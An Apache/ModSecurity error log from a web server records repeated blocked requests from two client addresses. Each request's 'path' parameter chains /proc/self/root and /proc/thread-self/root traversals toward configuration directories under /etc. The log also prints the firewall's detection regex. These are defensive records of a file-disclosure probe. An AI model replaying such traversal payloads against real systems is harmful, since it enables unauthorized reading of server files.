[Tue Mar 17 16:50:33.952115 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:53022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwicU6Sx0TG1YjmQi_egAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:34.208339 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:53022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwisU6Sx0TG1YjmQi_ewAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:37.118804 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:53026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwjRj0p0SRWAqcjGGKVAAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:37.288612 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:53026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwjRj0p0SRWAqcjGGKVQAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:39.319551 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:53612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwj9a6ubjKNq_cu4YZQAAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:45.109835 2026] [proxy_fcgi:error] [pid 7437:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:50:46.524113 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:53618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwlqBJNF7axNlVR0UpTgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:50.311098 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.241.31:39676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwmq4xEDsg_V3ESNZchAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:55.991499 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:39686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwnxj0p0SRWAqcjGGKXQAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:50:58.484815 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:36410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwonIk7brgkOH-rIWc_wAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:00.662873 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.241.31:36418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwpIh-PF_25v4hFRB8IgAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:03.641801 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:36426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwpxj0p0SRWAqcjGGKYwAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:09.133798 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:51:11.290726 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:47172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwr3Ik7brgkOH-rIWdBwAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:15.096493 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:47184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwshj0p0SRWAqcjGGKbAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:16.218544 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.128:38946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwtKBJNF7axNlVR0UpYAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:17.786406 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.243.128:58228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwtcU6Sx0TG1YjmQi_uQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:51:18.039517 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:47190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwtnIk7brgkOH-rIWdDQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:19.386810 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:42220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwt_PqhzTj3BvfDX-YsAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:20.285574 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.243.128:58242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwuPPqhzTj3BvfDX-YtAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:20.942011 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:42228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwuK4xEDsg_V3ESNZcjgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:21.614959 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.243.128:37886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwua4xEDsg_V3ESNZcjwAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:51:23.071504 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:42234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwu8U6Sx0TG1YjmQi_2AAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
